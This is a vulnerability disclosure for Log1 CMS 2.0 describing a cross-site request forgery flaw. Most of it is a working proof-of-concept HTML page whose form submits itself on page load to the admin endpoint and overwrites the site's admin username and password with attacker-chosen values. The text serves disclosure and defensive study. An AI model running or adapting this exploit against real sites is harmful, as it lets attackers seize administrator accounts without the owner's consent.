Log1 CMS version 2.0 suffers from a cross site request forgery vulnerability.
e8537ae030f9b8994517fa0faf86acc754535442cfb6f11e037c41d9eba00051
<!------------------------------------------------------------------------
# Software................Log1 CMS 2.0
# Vulnerability...........Cross-site Request Forgery
# Download................http://log1cms.sourceforge.net/
# Release Date............7/5/2010
# Tested On...............Windows Vista + XAMPP
# ------------------------------------------------------------------------
# Author..................John Leitch
# Site....................http://cross-site-scripting.blogspot.com/
# Email...................john.leitch5@gmail.com
# ------------------------------------------------------------------------
#
# --Description--
#
# A cross-site request forgery vulnerability in Log1 CMS 2.0 can be
# exploited to change the admin username and password.
#
#
# --PoC-->
<html>
<body onload="document.forms[0].submit()">
<form method="POST" action="http://localhost/log1cms2.0/admin/main.php?action=step1">
<input type="hidden" name="title" value="log1 CMS" />
<input type="hidden" name="desc" value="log1cms official page" />
<input type="hidden" name="key" value="log1, log 1, CMS, content managment system" />
<input type="hidden" name="language" value="0" />
<input type="hidden" name="bgcolor" value="#ffffff" />
<input type="hidden" name="textcolor" value="#999999" />
<input type="hidden" name="specialcolor" value="#000000" />
<input type="hidden" name="login" value="admin" />
<input type="hidden" name="pass" value="Password1" />
<input type="hidden" name="isMd5" value="1" />
<input type="hidden" name="google_login" value="gerard.caplain" />
<input type="hidden" name="email" value="log_1[ at ]users.sourceforge.net" />
<input type="hidden" name="copyright" value="2010 by log1" />
</form>
</body>
</html>